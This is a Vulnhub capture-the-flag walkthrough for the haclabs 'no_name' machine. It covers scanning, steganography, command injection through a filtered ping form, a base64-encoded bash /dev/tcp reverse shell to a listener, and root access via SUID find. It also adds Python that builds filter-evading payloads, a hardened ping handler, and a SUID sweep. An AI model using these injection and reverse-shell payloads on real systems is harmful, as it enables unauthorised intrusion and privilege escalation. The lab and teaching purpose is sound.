Vulnhub: detailed walkthrough of the Hacklabs No Name box (different privilege escalation methods)

Hacklabs No Name

Target machine information

Name: haclabs: no_name

Address:

https://www.vulnhub.com/entry/haclabs-no_name,429/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:ce:24:39      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.151  08:00:27:7e:00:9e      1      60  PCS Systemtechnik GmbH           

Kali Linux's built-in netdiscover tool identifies the target host's IP address as 192.168.56.151.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.151 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 22:18 EST
Nmap scan report for bogon (192.168.56.151)
Host is up (0.00014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:7E:00:9E (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.04 seconds
                                                                                 

The NMAP scan shows that the target host has a single open port: 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ nikto -h http://192.168.56.151
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.151
+ Target Hostname:    192.168.56.151
+ Target Port:        80
+ Start Time:         2023-01-03 22:20:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-01-03 22:21:51 (GMT-5) (59 seconds)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/03 22:22:52 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 417]
/server-status        (Status: 403) [Size: 279]
Progress: 219201 / 220561 (99.38%)
===============================================================
2023/01/03 22:24:15 Finished
===============================================================

Gobuster finds the /admin directory. Visiting it shows three images; download them to Kali Linux and analyze them:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg  new.jpg  nmap_full_scan  Short.png
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ steghide extract -sf haclabs.jpeg    
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ stegseek haclabs.jpeg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "harder"           
[i] Original filename: "imp.txt".
[i] Extracting to "haclabs.jpeg.out".

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg  haclabs.jpeg.out  new.jpg  nmap_full_scan  Short.png
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ cat haclabs.jpeg.out 
c3VwZXJhZG1pbi5waHA=
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ echo 'c3VwZXJhZG1pbi5waHA=' | base64 -d    
superadmin.php                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ steghide extract -sf new.jpg     
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ stegseek new.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "lol"
[i] Original filename: "user.txt".
[i] Extracting to "new.jpg.out".

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg  haclabs.jpeg.out  new.jpg  new.jpg.out  nmap_full_scan  Short.png
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ cat new.jpg.out     
admin
Admin
root
admin1
msfadmin
Admin1
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ exiftool Short.png                     
ExifTool Version Number         : 12.44
File Name                       : Short.png
Directory                       : .
File Size                       : 1019 kB
File Modification Date/Time     : 2023:01:03 22:26:04-05:00
File Access Date/Time           : 2023:01:03 22:26:04-05:00
File Inode Change Date/Time     : 2023:01:03 22:26:04-05:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 5666
Image Height                    : 4449
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Pixels Per Unit X               : 11811
Pixels Per Unit Y               : 11811
Pixel Units                     : meters
Image Size                      : 5666x4449
Megapixels                      : 25.2

Visiting /superadmin.php returns a page with a "ping an IP" function. Check whether it is vulnerable to command injection:

The target appears to apply a filter to the input, so a bypass is needed.

It turns out that

8.8.8.8 | id

gets past the filter, as does

8.8.8.8 | echo 'jason'

Construct the command:

8.8.8.8 | more superadmin.php

(the ping runs with the web root as its working directory, so a relative filename avoids the blocked "/"). The returned page contains the source of superadmin.php:

<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>

<pre>::::::::::::::
superadmin.php
::::::::::::::
<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>

<?php
if (isset($_POST['submitt']))
{
    $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
    $pinged=$_POST['pinger'];
    $newStr = str_replace($word, "", $pinged);
    if(strcmp($pinged, $newStr) == 0)
    {
        $flag=1;
    }
    else
    {
        $flag=0;
    }
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>


</pre>

Once the filter is understood, the rest is easy. The blocklist removes ";", "&&", "&", "/" and the substrings "bin", "ls", "nc", "dir" and "pwd", and rejects the input if anything was removed; it does not touch "|", "echo", "base64" or "bash". So the trick is to base64-encode the reverse shell (which hides the "/" in /dev/tcp) and decode it on the target:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ echo "bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'" | base64 
YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjE0Ni81NTU1IDA+JjEnCg==

Then enter the following in /superadmin.php:

8.8.8.8 | echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjE0Ni81NTU1IDA+JjEnCg== | base64 -d | bash

Kali Linux then receives the reverse shell from the target:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.151] 51898
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/var/www/html$ 
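The following is an added example, not code from the original post or from the target. It re-implements the superadmin.php blocklist in Python so candidate payloads can be checked offline before they are sent, builds the base64-wrapped reverse shell used above while guarding against a caveat the walkthrough skips (standard base64 output uses "/" and can by chance contain "ls", "nc", "dir" or "bin", any of which the filter would reject), and shows the hardened form of the ping handler. The 8.8.8.8 prefix and the listener 192.168.56.146:5555 are taken from the page; the padding approach, the function names and the candidate payloads are my own.

```python
"""Offline model of the superadmin.php blocklist (added example, not code
from the target or the original post). The $word list and the
str_replace/strcmp logic are copied from the page; the candidate payloads
and helper names are constructed here."""
from __future__ import annotations

import base64
import ipaddress

# The exact $word array from superadmin.php. str_replace removes every
# occurrence of every entry; strcmp() == 0 then means "nothing was removed".
BLOCKLIST = [";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"]


def php_filter_allows(payload: str) -> bool:
    """Mirror of the PHP check: the request is executed only if stripping
    every blocklisted substring leaves the input unchanged."""
    stripped = payload
    for word in BLOCKLIST:
        stripped = stripped.replace(word, "")
    return stripped == payload


def blocked_terms(payload: str) -> list[str]:
    """Blocklist entries present in the payload (why a candidate was rejected)."""
    return [word for word in BLOCKLIST if word in payload]


def encode_for_filter(command: str, max_pad: int = 64) -> str:
    """Build the '8.8.8.8 | echo <b64> | base64 -d | bash' payload used above.
    Standard base64 uses '/' and may by chance contain 'ls', 'nc', 'dir' or
    'bin'; any of those trips the filter. Trailing spaces are a no-op for
    bash, so pad the command until its encoding is clean instead of
    trusting luck."""
    for pad in range(max_pad):
        b64 = base64.b64encode((command + " " * pad).encode()).decode()
        payload = f"8.8.8.8 | echo {b64} | base64 -d | bash"
        if php_filter_allows(payload):
            return payload
    raise ValueError("no clean base64 encoding found within padding budget")


def decode_payload(payload: str) -> str:
    """What the target's `base64 -d | bash` stage will execute (padding removed)."""
    b64 = payload.split()[3]  # ['8.8.8.8', '|', 'echo', '<b64>', '|', ...]
    return base64.b64decode(b64).decode().rstrip(" ")


def build_ping_argv(user_input: str, count: int = 3) -> list[str]:
    """Hardened replacement for shell_exec("ping -c 3 $pinged"): accept only
    a literal IP address and hand it to ping as its own argv element (run
    with subprocess.run(argv), no shell), so there is no blocklist to bypass."""
    ip = ipaddress.ip_address(user_input.strip())  # ValueError on anything else
    return ["ping", "-c", str(count), str(ip)]


def is_valid_ping_target(user_input: str) -> bool:
    """Boolean wrapper around build_ping_argv for callers that prefer a verdict."""
    try:
        build_ping_argv(user_input)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for candidate in ["8.8.8.8", "8.8.8.8; id", "8.8.8.8 && ls",
                      "8.8.8.8 | id", "8.8.8.8 | cat /etc/passwd"]:
        if php_filter_allows(candidate):
            verdict = "passes the filter"
        else:
            verdict = f"blocked by {blocked_terms(candidate)}"
        print(f"{candidate!r:32} {verdict}")
    shell = "bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'"
    print(encode_for_filter(shell))
```

The hardened handler rejects "8.8.8.8 | id" not because "|" is on a list but because it is not an IP address; combined with an argv list instead of a shell string, the injection class disappears rather than being patched one metacharacter at a time.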

Privilege escalation

Upload linpeas.sh to the target's /tmp directory, make it executable and run it. Its output shows that find has the SUID bit set, so it can be used to escalate privileges: find's -exec runs an arbitrary program with find's effective UID (root), and the shell is started with -p so that it keeps that effective UID instead of dropping back to the real uid. The id output confirms the split: uid is still www-data, euid is root:

www-data@haclabs:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls -alh
total 40K
drwx------  6 root root 4.0K Feb 15  2020 .
drwxr-xr-x 24 root root 4.0K Jan 30  2020 ..
-rw-------  1 root root    5 Feb 15  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Jan 30  2020 .cache
drwx------  5 root root 4.0K Jan 30  2020 .config
drwx------  3 root root 4.0K Jan 27  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Jan 27  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   97 Jan 30  2020 flag3.txt
cat flag3.txt
Congrats!!!You completed the challenege!



                                                   ()    ()

                                                 \          /
                                                  ----------
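The linpeas.sh step above is reported only by its conclusion. As an added example (this is not linpeas.sh and not output from the target), here is a manual sweep for setuid binaries, the Python equivalent of `find / -perm -4000 -type f 2>/dev/null`, which is the check to run when a third-party script cannot be uploaded. The throwaway directory tree it builds for the demo is constructed, and the file names inside it are assumptions.

```python
"""Manual SUID sweep (added example; not linpeas.sh and not output from the
target). Walks a tree with lstat, reports regular files carrying the setuid
bit together with their owner and mode string, so a hit such as
/usr/bin/find can be confirmed by hand. The demo tree is constructed here."""
from __future__ import annotations

import os
import pwd
import stat
import tempfile

# Pseudo filesystems that are noisy or can hang a walk; skipped the way a
# manual `find -xdev ... 2>/dev/null` sweep effectively skips them.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_suid(mode: int) -> bool:
    """True for a *regular file* whose setuid bit is set (stat mode 0o104755
    is what ls shows as -rwsr-xr-x). Directories with the bit are ignored."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str) -> list[str]:
    """Sorted paths of setuid regular files under root.
    lstat is used so symlinks are judged by their own mode (never followed),
    and unreadable directories or files are skipped instead of aborting."""
    hits: list[str] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def describe(path: str) -> str:
    """One report line in the spirit of `ls -l`: mode string, owner, path.
    A setuid file owned by root is the interesting case: any -exec style
    primitive it offers runs with euid=0 while the real uid stays the same,
    which is exactly the uid=33/euid=0 split seen in the id output above."""
    st = os.lstat(path)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    return f"{stat.filemode(st.st_mode)} {owner:<10} {path}"


def demo_tree() -> tuple[str, str]:
    """Build a throwaway tree with one setuid file and one plain file so the
    sweep can be exercised without root; returns (root, path_of_suid_file).
    Names mimic the target's layout but are assumptions, not its contents."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    os.makedirs(os.path.join(root, "usr", "bin"))
    suid_path = os.path.join(root, "usr", "bin", "find")
    plain_path = os.path.join(root, "usr", "bin", "ls")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)   # -rwsr-xr-x
    os.chmod(plain_path, 0o755)   # -rwxr-xr-x
    return root, suid_path


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else demo_tree()[0]
    for hit in find_suid(root):
        print(describe(hit))
```

Run it as `python3 suid_sweep.py /` on the target to reproduce the relevant part of the linpeas output; with no argument it sweeps its own demo tree. Every root-owned hit that is not a stock distribution binary (passwd, sudo, mount and friends) deserves the same scrutiny find received here.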


posted @ 2023-01-04 12:03  Jason_huawen